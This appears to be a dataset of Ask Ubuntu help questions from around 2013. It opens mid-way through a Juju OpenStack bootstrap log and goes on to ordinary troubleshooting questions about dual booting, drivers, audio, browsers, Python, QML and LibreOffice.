ohgb57uilt # usually set via the env variable os_tenant_name , but can be specified here tenant-name : demo region : regionone state-port : 27017 and juju -- debug bootstrap -- upload-tools juju -- debug bootstrap -- upload-tools 2013-11-20 02:06:05 info juju.provider.openstack provider.go:126 opening environment `` openstack '' 2013-11-20 02:06:05 debug juju.environs.tools storage.go:87 uploading tools for [ unknown precise ] 2013-11-20 02:06:05 debug juju.environs.tools build.go:109 looking for : bin/juju 2013-11-20 02:06:05 debug juju.environs.tools build.go:150 checking : /home/chenxi05/project/gocode/bin/jujud 2013-11-20 02:06:05 info juju.environs.tools build.go:156 found existing jujud 2013-11-20 02:06:05 info juju.environs.tools build.go:166 target : /tmp/juju-tools098431528/jujud 2013-11-20 02:06:05 debug juju.environs.tools build.go:217 forcing version to 1.13.3.1 2013-11-20 02:06:05 debug juju.environs.tools build.go:37 adding entry : & tar.header { name : '' force-version '' , mode:436 , uid:0 , gid:0 , size:8 , modtime : time.time { sec:63520509965 , nsec:0 , loc : ( *time.location ) ( 0x1095da0 ) } , typeflag:0x30 , linkname : '' '' , uname : '' ubuntu '' , gname : '' ubuntu '' , devmajor:0 , devminor:0 , accesstime : time.time { sec:63520509965 , nsec:0 , loc : ( *time.location ) ( 0x1095da0 ) } , changetime : time.time { sec:63520509965 , nsec:0 , loc : ( *time.location ) ( 0x1095da0 ) } } 2013-11-20 02:06:05 debug juju.environs.tools build.go:37 adding entry : & tar.header { name : '' jujud '' , mode:509 , uid:0 , gid:0 , size:19240512 , modtime : time.time { sec:63520509965 , nsec:0 , loc : ( *time.location ) ( 0x1095da0 ) } , typeflag:0x30 , linkname : '' '' , uname : '' ubuntu '' , gname : '' ubuntu '' , devmajor:0 , devminor:0 , accesstime : time.time { sec:63520509965 , nsec:0 , loc : ( *time.location ) ( 0x1095da0 ) } , changetime : time.time { sec:63520509965 , nsec:0 , loc : ( *time.location ) ( 0x1095da0 ) } } 2013-11-20 02:06:08 info juju.environs.tools storage.go:106 built 1.13.3.1-unknown-amd64 ( 4206kb ) 2013-11-20 02:06:08 info juju.environs.tools storage.go:112 uploading 1.13.3.1-precise-amd64 2013-11-20 02:06:09 info juju.environs.tools storage.go:112 uploading 1.13.3.1-unknown-amd64 2013-11-20 02:06:10 info juju.environs.tools tools.go:29 reading tools with major version 1 2013-11-20 02:06:10 info juju.environs.tools tools.go:34 filtering tools by version : 1.13.3.1 2013-11-20 02:06:10 info juju.environs.tools tools.go:37 filtering tools by series : precise 2013-11-20 02:06:10 debug juju.environs.tools storage.go:41 reading v1 . * tools 2013-11-20 02:06:11 debug juju.environs.tools storage.go:61 found 1.13.3.1-precise-amd64 2013-11-20 02:06:11 debug juju.environs.tools storage.go:61 found 1.13.3.1-unknown-amd64 2013-11-20 02:06:21 info juju.environs.boostrap bootstrap.go:57 bootstrapping environment `` openstack '' 2013-11-20 02:06:21 info juju.environs.tools tools.go:29 reading tools with major version 1 2013-11-20 02:06:21 info juju.environs.tools tools.go:34 filtering tools by version : 1.13.3.1 2013-11-20 02:06:21 info juju.environs.tools tools.go:37 filtering tools by series : precise 2013-11-20 02:06:21 debug juju.environs.tools storage.go:41 reading v1 . * tools 2013-11-20 02:06:21 debug juju.environs.tools storage.go:61 found 1.13.3.1-precise-amd64 2013-11-20 02:06:21 debug juju.environs.tools storage.go:61 found 1.13.3.1-unknown-amd64 2013-11-20 02:06:21 debug juju.environs.simplestreams simplestreams.go:351 can not load index `` http : //10.38.250.221:8081/v1/auth_c8ac55a301db40e4ac7380b7994c2a34/juju-dist/streams/v1/index.sjson '' : unauthorised access to url `` http : //xx.xx.xxx.xxx:8081/v1/auth_c8ac55a301db40e4ac7380b7994c2a34/juju-dist/streams/v1/index.sjson '' 2013-11-20 02:06:21 debug juju.environs.simplestreams simplestreams.go:351 can not load index `` http : //127.0.0.1:8001/releases/streams/v1/index.sjson '' : can not find url `` http : //127.0.0.1:8001/releases/streams/v1/index.sjson '' not found 2013-11-20 02:06:21 debug juju.environs.simplestreams simplestreams.go:351 can not load index `` http : //10.38.250.221:8081/v1/auth_c8ac55a301db40e4ac7380b7994c2a34/juju-dist/streams/v1/index.json '' : unauthorised access to url `` http : //xx.xx.xxx.xxx:8081/v1/auth_c8ac55a301db40e4ac7380b7994c2a34/juju-dist/streams/v1/index.json '' 2013-11-20 02:06:21 debug juju.environs.simplestreams simplestreams.go:356 read metadata index at `` http : //127.0.0.1:8001/releases/streams/v1/index.json '' 2013-11-20 02:06:21 debug juju.environs.simplestreams simplestreams.go:491 candidate matches for products [ `` com.ubuntu.cloud : server:12.04 : amd64 '' ] are [ 0xc20018c580 ] 2013-11-20 02:06:21 debug juju.environs.simplestreams simplestreams.go:836 finding products at path `` streams/v1/com.ubuntu.cloud : released : aws.json '' 2013-11-20 02:06:21 debug juju.provider.openstack provider.go:646 openstack user data ; 10696 bytes 2013-11-20 02:06:22 info juju.provider.openstack provider.go:693 started instance `` fabe2986-66e4-4ce1-affe-83c38f250369 '' 2013-11-20 02:06:23 info juju supercommand.go:284 command finished what 's more , i copy the releases/streams/v1/index.json to local , and point the imageid to my glanceid , the instance started and juju install and start the mongodb automation . when the jujud bootstrap start , it hangs everytime . help~~~ please~~~
379328	usb bootable stick crashed	i was installing ubuntu 12.04 alongside windows from bootable usb pen drive . but the installation failed . now the my computer is not starting even with windows . it shows grab error . what should i do .
379330	problem in dual boot windows and ubuntu : does n't proceed	i was trying to dual boot my ubuntu and windows , but i was totally stuck on the partition part . when i clicked on quit and tried to boot into my windows it did n't boot only a black screen with a small cursor blinked continuously . then i ran ubuntu without installing from live usb and though i can see the windows loader partition in gparted it ca n't boot into it . when i 'm trying to resize my other partition for creating space to install ubuntu it is unable to resize . it also shows a warning like unable to read the contents of this file system . i 'm totally stuck . i do n't know if i should reinstall my windows first or just try to install ubuntu . what should i do ?
379331	chrome ( ? ) hard crash - where do i start to diagnose ?	my 12.04 system crashes hard for no apparent reason . the screen locks , the mouse and keyboard both become unresponsive and all i can do is pull the power lead and restart . i can not ctrl+alt+f1 to get to a terminal and do anything there . where do i start to diagnose the issue ? it seems the case that it happens only when using chrome , but given that i am most often using chrome ( as opposed to some other application ) , this could be just a coincidence and chrome is not to blame . i 've looked in the log file viewer but do n't know which log ( s ) to concentrate on . chrome version : version 31.0.1650.57 output of uname -a : linux cooler-master 3.2.0-56-generic-pae # 86-ubuntu smp wed oct 23 17:51:27 utc 2013 i686 i686 i386 gnu/linux edit : please see log file at /var/log/syslog at this pastebin link . further edit : i can see that a crash report was uploaded to google ( i enabled crash reporting before the latest crash ) in ~/.config/google-chrome/crash reports . the problem i have is that the crash does n't simply render chrome unusable , it takes down the whole system . the screen does n't refresh ( for example the clock display in the top right of the screen does n't advance ) , the keyboard and mouse are unusable and i can not get to the terminal . does anyone else have this issue ?
379335	i want to disable usb storage but usb mouse keyboard and datacard should work	i want to disable usb storage but usb mouse keyboard and datacard should work ? please help all commands i came across is disabling the usb has a whole
379340	ifconfig up for multiple interfaces	i want to execute `` up '' command for multiple interfaces and thought that using ifconfig eth { 0..3 } up would help , it does n't , how can i achieve this ?
379341	driver needed for your disk drive ubuntu 12.04	hello i am currently doing some installation of ubuntu 12.04 on a dell poweredge t320 . i got to the partitioning of the hard drive and i chose manual . i was supposed to see 3 hard drives in there but found only 2 that is : scsi ( 2,0,0 ) sda and scsi ( 2,1,0 ) s sdb . so i pulled the last hard drives out to see if there is an actual hdd in the disk tray . now when i boot i do n't see any drive lister on the bios and it says driver needed for you disk drive how do i possibly fix that ? thank you
379344	ubuntu 13.04 boot black screen after update	after last update i can not login to ubuntu 13.04 anymore , i face a black screen after choosing ubuntu from grub menu , and i ca n't reach the login screen . please tell me what to do because i have important bookmarks in firefox browser ! and please do it in a easy way because i 'm a beginner user .
379345	no sound from sonic master sub woofer asus n56dp	my laptop has a special port for this sub woofer and pulse is not recognizing it . i know this has already been asked and answered for similar laptops , but their solutions included intel drivers , but mine is amd and even in windows it uses a realtek driver . please help . lspci output : 00:00.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9900 00:01.1 audio device : advanced micro devices [ amd ] nee ati trinity hdmi audio controller 00:02.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port 00:04.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port 00:05.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port 00:10.0 usb controller : advanced micro devices [ amd ] fch usb xhci controller ( rev 03 ) 00:10.1 usb controller : advanced micro devices [ amd ] fch usb xhci controller ( rev 03 ) 00:11.0 sata controller : advanced micro devices [ amd ] fch sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] fch usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] fch usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] fch usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] fch usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] fch smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices [ amd ] fch azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] fch lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] fch pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 0 00:18.1 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 5 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati chelsea lp [ radeon hd 7730m ] 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 0a ) lsusb output : bus 002 device 002 : id 1bcf:2883 sunplus innovation technology inc . bus 004 device 004 : id 13d3:3362 imc networks bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 007 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0003 linux foundation 3.0 root hub
379346	convert iso to dmg using toast to put ubuntu on usb stick ?	can i use toast to make the iso a dmg file ? basically replacing steps 2 , 3 on this guide . i 'm new to this and do n't know how to use terminal or anything like that . i want to be able to install and run ubuntu on a 16gb flash drive and run on my mac osx laptops , without directly installing anything on them . i 've never tried linux before , how should i proceed ?
379347	cant install ubuntu or troubleshoot windows 8	i have tried to install ubuntu 12.04 64bits with no success . i get the black screen with the blinking cursor . i am fairly new at this but have tried my hardest to fix my computer with google search with no luck . the bootable usb does work as i have tried it with another laptop . i specified nomodeset , noapic , pretty much all of them with no success . also , i have tried to change the uefi setup but that option is not available in my boot setups . i have also tried to reinstall windows 8 and it wont work . i have tried to refresh , restore , troubleshoot , factory reset and my computer just powers off when preparing . i cant find anything online with a similar problem . i am desperate to install ubuntu ! how to fix this ?
379348	using xmodmap automatically after login	every time i reboot or start my computer , ubuntu 13.10 looses my xmodmap . i have to type : xmodmap .xmodmap and the mapping works . how can i have this xmodmap automatically ?
379350	two computers ca n't connect to the same vpn simultaneously	my colleague and i are on the same local network , trying to connect to our office headquarter 's vpn . any of us can connect without trouble , but when we try together , the second computer fails to connect . our configs are 13.04 and 13.10 . my colleague tried with a fedora distro , which produced the same error . when we try with windows pc or android smartphone , everything works fine . any help is welcome . edit : more details : we both use the native vpn that we activate via the vpn connections menu in the network menu , top right corner of the default unity desktop . we both have different logins/keys to connect .
379351	how can i check for available dbus services ?	dose any one knows how to check on all available dbus in ubuntu 12.04 ?
379356	how to access ubuntu files in windows 7 while having dual boot ?	i just installed windows 7 along with ubuntu 13.04 . i have all my software dump in my ubuntu partitions which i want to install in windows 7 . how can i access the ubuntu partition so that i can copy my software files in windows 7 ? i ca n't even see partition of ubuntu .
379358	video recording of webcam not working ( guvcview & cheese )	when installing linux cheese was already there and while recording video from cheese it freezes . i then installed guvcview at first it worked fine later when i press record button the guvcview turns off . i 'm able to capture video from vlc but what might be the problem with cheese and guvcview ? is there any way to solve problem of guvcview ? the output of guvcview is * guvcview 1.7.1 file guvcview_video.mkv has extension type 1 file guvcview_image.jpg has extension type 0 file guvcview_image.jpg has extension type 0 video file suffix detected : 35 image file suffix detected : 16 alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) alsa lib pcm_dmix.c:961 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started video device : /dev/video0 init . laptop_integrated_webcam_fhd ( location : usb-0000:00:1a.0-1.5 ) { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/10 , { discrete : width = 1920 , height = 1080 } time interval between frame : 1/5 , { pixelformat = 'mjpg ' , description = 'mjpeg ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/15 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/15 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/15 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/15 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/15 , { discrete : width = 1920 , height = 1080 } time interval between frame : 1/30 , 1/15 , { pixelformat = 'rgb3 ' , description = 'rgb3 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/15 , { discrete : width = 1920 , height = 1080 } time interval between frame : 1/30 , 1/15 , { pixelformat = 'bgr3 ' , description = 'bgr3 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/15 , { discrete : width = 1920 , height = 1080 } time interval between frame : 1/30 , 1/15 , { pixelformat = 'yu12 ' , description = 'yu12 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/15 , { discrete : width = 1920 , height = 1080 } time interval between frame : 1/30 , 1/15 , { pixelformat = 'yv12 ' , description = 'yv12 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 2/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/15 , { discrete : width = 1920 , height = 1080 } time interval between frame : 1/30 , 1/15 , vid:05ca pid:181d driver : uvcvideo checking format : 1196444237 vidioc_g_comp : : inappropriate ioctl for device fps is set to 1/15 drawing controls checking video mode 640x480 @ 32bpp : ok write /home/sushil/.config/guvcview/video0 ok free controls cleaned allocations - 100 % closing portaudio ... ok closing gtk ... ok
379359	how to check which version of library is used and how to change ?	i have ubuntu 12.10 installed , with imagemagick and libjpeg6 and libjpeg8 libraries installed . i am now wondering if there is a way to determine , which version is used , and to change it .
379366	python 3.2 script not working and/or importing tkinter when running from desktop	i 'm really puzzled by this , but the answer is probably quite simple and just ca n't see it : i have a series of python modules that work fine from within the python interpreter , but nothing happens when running from a gui situation . i 've tried creating a .desktop file , adding shebangs , changing permissions to 777 and renaming to .pyw for all the modules . a single test module works fine on its own , so i know that it 's not a typo error . if i click the main module .pyw file and click 'run ' from the system dialogue nothing happens at all . similarly the .py file ( and the .desktop via menu ) , nothing happens . here is the start of my code : # ! /usr/bin/python3 import tkinter as tk , imp , sys root = tk.tk ( ) msg = tk.messagebox sdg = tk.simpledialog import capitaliser_cfg as cfg , fileio as io imp.reload ( cfg ) ; imp.reload ( io ) # # # go and get county list # # # # # nb : attach to config for simplicity cfg.counties = io.getfilelist ( `` counties.txt '' , `` london '' ) if not type ( cfg.counties ) ==list : k = msg.showerror ( cfg.version , cfg.counties ) root.destroy ( ) root.mainloop ( ) # # # go and get dictionary # # # # cfg.tempdict = [ [ ] , [ ] , [ ] ] cfg.spelldict = io.getdictionary ( `` addressdict.txt '' , '' roda '' , '' road '' ) if not type ( cfg.spelldict ) ==dict : k = msg.showerror ( cfg.version , cfg.spelldict ) root.destroy ( ) root.mainloop ( ) import thinbutton as tb , labelradio as lr , fieldblock as fb , bigbutton as bb import textblock as tx , padding as pd , widget_tools as wt import capitaliser_mth as mth import capitaliser_bnd as bnd imp.reload ( tb ) ; imp.reload ( lr ) ; imp.reload ( fb ) ; imp.reload ( bb ) imp.reload ( tx ) ; imp.reload ( pd ) ; imp.reload ( wt ) ; imp.reload ( mth ) imp.reload ( bnd ) if i put k = msg.showerror ( `` xxxx '' , '' yyyy '' ) after the line sdg = tk.simpledialog , stil nothing happens which leads me to believe that tkinter is not loading for some reason . any ideas anyone ?
379368	how to configure a server	i have 8 computers , a switch and a modem . they all run windows 7 and connected to a windows 7 server . i replaced the clients with ubuntu 12.04.3 and uninstalled the proxy from the windows 7 server and now i can connect to the internet on all clients . the issue is that i want to replace the windows 7 server with ubuntu 12.04.3 but i do n't know how to configure it so that it can connect to the internet and share it .
379369	python3-lxc and lxc parallel installation not possible !	every time i try to install one of the package lxc and python3-lxc the other one is removed from my system . how i can fix this problem ? i need both for a project . thank you !
379372	where can i download linux-signed-image kernels ?	i like to test new kernels but as i 'm using a notebook with uefi i just only limited to regular updates . is there any repository where i can download the package linux-image-signed-3.xx-x-generic ? today on machines without the uefi i download the packages : linux-headers-3.12.0-031200-generic_3.12.0-031200.201311031935_amd64.deb linux-headers-3.12.0-031200_3.12.0-031200.201311031935_all.deb linux-image-3.12.0-031200-generic_3.12.0-031200.201311031935_amd64.deb all in repository http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.12-saucy .
379375	how to enable onboard keyboard in fullscreen mode ( using firefox ) ?	i want to use the onboard keyboard to enter text into a form in a website i have open in firefox . ideally i want to run firefox in fullscreen mode . in non-fullscreen mode onboard comes up no problem , but when i enter fullscreen onboard disappears , and does n't show until i leave fullscreen mode again . i have tried the obvious things such as while in fullscreen clicking the hovering onboard icon , and having onboard automatically appearing when highlighting a text input . in both cases it seems onboard does start , except it again does not actually show up untill i leave fullscreen . i assume that fullscreen mode means you enter some different sort of 'display session ' , to which onboard has no access . i observed the same behaviour when using chromium instead of firefox , so i guess this is less related to firefox , and more to the os display manager . i am running lightdm by the way , in a gnome 3 session ( not using unity ) . so i 'm wondering what is actually happening when entering fullscreen mode , i.e . why does onboard disappear ? and is there any way of making onboard show in fullscreen mode ?
379376	gnome shell title bar wo n't change	i 've gnome shell 3.8.4 on ubuntu 13.10 and gnome-tweak-tool but i ca n't change the title bar ( i think that it 's metacity-1 that does it ) with any theme . i can change icons , everything else on the window and the shell theme . any ideia ? i 've tried many theme 's from gnome-look.org and i 've verified if it has the metacity-1 folder .
379377	bing picture of the day as desktop wallpaper ?	can anyone help me out with how to make bing picture to my desktop wallpaper ? so it works by downloading the highest quality of todays picture . then storing it ex in the picture folder of your account . after that automatically changing the picture itself . it should continue the same everyday without hassle in the background . probably something i have to add in the startup applications . any differences between ubuntu versions ? -do i have to write a script ? this would be appreciated by many others too ! thank you in advance : )
379378	get qml default value of a widget	how to receive the default value of e.g . textedit font.pointersize ? i would like to create a custom widget that uses some default values but allows to set some values from outside . therefore it is necessary - as far as i know - to add a property variable that is accessible from outside ( in this example it 's fontpointersize ) . i want this default property to be the default of an existing qml widget . main.qml import qtquick 2.0 rectangle { id : background ; color : `` white '' ; width : 200 ; height : 200 ; mywidget { id : widget // fontpointersize : 14 anchors.topmargin : 8 anchors.top : picker.bottom } } mywidget.qml import qtquick 2.0 rectangle { width : 100 height : 26 color : `` orange '' // how to get text font.pointersize default ? property real fontpointersize : 11 text { id : name text : qstr ( `` hello world '' ) font.pointsize : fontpointersize anchors.fill : parent horizontalalignment : text.alignhcenter verticalalignment : text.alignvcenter } }
379380	switch audio output from pa to jack , breaks audio on google-chrome	i occasionally switch audio output from the ubuntu default pulse-audio to jack . this has created several problems that i have n't managed to fix in the past ( no sound from firefox ever again , then switched to chromium which was fine ) , but now i am using google-chrome and whenever i switch on jack , i get no sound from the application . mind you , audio works fine from , say jukebox . the steps i take to switch on jack are the following : - run qjackctl - start the audio server . note : usually the pa tp jack source and sink modules have n't been started ( why , oh why ? ) so i fire up a console and type in : pactl load-module module-jack-sink channels=2 ; pactl load-module module-jack-source channels=2 ; pactl set-default-sink jack_out ; pactl set-default-source jack_in there , now jackd is up and running . now , i fire google-chrome from command line , and see the following when i visit a page in youtube to see a video : [ 22624:22645:1119/161906 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) argh ! any ideas ?
379381	running 3d engine with ati hd2400 gpu drivers for 13.10	i have recently instaled ubuntu 13.10 on my toshiba satellite laptop running a ati hd 2400 mobility , but i do n't seem to get the 3d to work fine . i know that there was some sort of legacy drivers for ati older models but it is n't supported since 12.03 . i checked with steam and i saw that now with 13.10 i 'm running some sort of rv610/rv630 driver , but when i try to play football manager 2014 , everything runs great with the 2d engine , but if i try the 3d it just wo n't work right . is there a way to get this sorted or configure the 3d ?
379386	can not find cap file on home folder	i have run aircrack-ng on ubuntu 13.10 that i was download from ubuntu software centre.the problem is after running aireplay-ng to catch the cap file , i can not find the cap file on home folder.on other version ubuntu like 12.04 the file is always in home folder.so can anybody tell me why and where can i get that file on my system .
379390	display driver for laptop	i have recently started using ubuntu as my friend suggested it . i have figured out that display driver is not properly installed so display is not crystal clear . can you suggest from where i can download drivers my laptop is dell xps m1330
379396	boot repair fail after update	i ran an update on kubuntu and when i rebooted the boot failed . the boot repair gui did not work with the first option and advanced repair rebuilt grub ( i think ) . now kubuntu boots to kubuntuoffice @ kubuntuoffice or something similar . here are the pastebins http : //paste.ubuntu.com/6417197/ http : //paste.ubuntu.com/6417238/ thanks
379397	rssowl not working	i tried to use the latest version available of rssowl on ubuntu 12.10 . everything seems fine , except it does not show the content and gives the error message of connection time out . i am behind a proxy and proxy setting has no problem . how can i solve this issue ? thanks .
379403	i can not install xtreme download manager !	i followed the instruction given in the sourceforge forum but it did n't work.pls tell me some solutions . cd xdman/ chmod +x xdman.sh ./xdman.sh ./xdman.sh : 2 : ./xdman.sh : java : not found sudo ./xdman.sh [ sudo ] password for nishant : ./xdman.sh : 2 : ./xdman.sh : java : not found how can i resolve this ?
379404	how to check if one is using a raspberry pi ?	let us imagine that you are in a room with a black box ; you turn the box on and find that you are met with a helpful terminal . is there a command that could allow one to decipher that in that black box is a raspberry pi ?
379406	gpg error when running apt-get update	i have looked at many of the existing answers to this question and tried their suggestions , but they do not solve or answer the issue i am having . when i run apt-get update , i receive the following : gpg error : http : //us.archive.ubuntu.com precise release : the following signatures were invalid : nodata 1 nodata 2 i have tried the following : sudo -i apt-get clean cd /var/lib/apt mv lists lists.old mkdir -p lists/partial apt-get clean apt-get update and other posts describe using apt-key , but the error is not specifying a key . it seems that there is no key at all ? is there a command that would download a fresh key ? thanks
379407	chrome icon lost from panel	here are the screen shots : a zoom in of the bottom panel : as you can see , on ubuntu 's the bottom panel , the chrome icon is missing , how can i get it back ? i tried to completely remove chrome and re-install , no joy . i have also tried to delete all local .config/google-chrome folder files , still no joy .
379412	how to redirect apache /var/www to the home directory and access all the directories and files in my home directory ?	i have installed apache ( lamp ) web server on my ubuntu machine and i want to do the above mentioned thing.i have tried creating symbolic links in the /var/www directory but it only shows files but not directories inside the directory linked.i want to redirect /var/www to my home folder so that i can access all the files and directories contained therein.please help me .
379414	sending a fax via a mobile connected via a usb cable	i have a smartphone which i can connect through a usb ( universal serial bus ) cable . i wish to send a fax to a given number . which software in ubuntu can i use to send the fax ?
379416	saving xls as csv with libreoffice calc	i am using libreoffice 3.5.7.2 build id : 350m1 ( build:2 ) and would like to run libreoffice calc from the terminal to open an .xls document and output to .csv . i can do this via the gui by just opening the xls file and saving as csv and specifying the delimeter , but i would like to be able to do it via the terminal . research i 've done : when i run > man libreoffice i get : synopsis libreoffice [ -- accept=accept-string ] [ -- base ] [ -- calc ] [ -- convert-to output_file_extension [ : output_filter_name ] which has a command -- convert-to output but i am not exactly sure how an example of that would look , i tried : libreoffice -- convert-to csv : writer_csv_export -- outdir /data/ *.xls as https : //help.libreoffice.org/common/starting_the_software_with_parameters/vi mentions but it is not working .
379418	setup 2 cameras in motion app ubuntu 13.04	i 'd like to find out how can i setup two cameras using motion , i have a logitech webcam and a netcam , currently running motion with one camera , works great and using it to watch my garage , upload videos to dropbox . i wanto to use one camera to upload pictures to dropbox and the other one to take videos and archive those videos in a nas hard drive . thanks daniel
379424	dpi setting in ubuntu 13.10	can one change dpi setting in ubuntu 13.10 ? i tried this solution : how to find and change the screen dpi ? but : i do n't have /etc/lightdm/lightdm.conf ( only /etc/lightdm/users.conf , and changing this did n't affect anything ) when i created 77set_dpi with xrandr -- dpi 90x90 my computer booted into console , what could i do ? i rm the file from /etc/x11/xsession.d/ i tried to use gnome-tweak-tools but there is no dpi options ( it can only scale font , and it 's great , but i 'd like bigger top panel ( with bigger icons etc ) i got 15,6 lcd panel with 1920x1080 resolution so my dpi should be ~142 . can anybody have solution for that problem ?
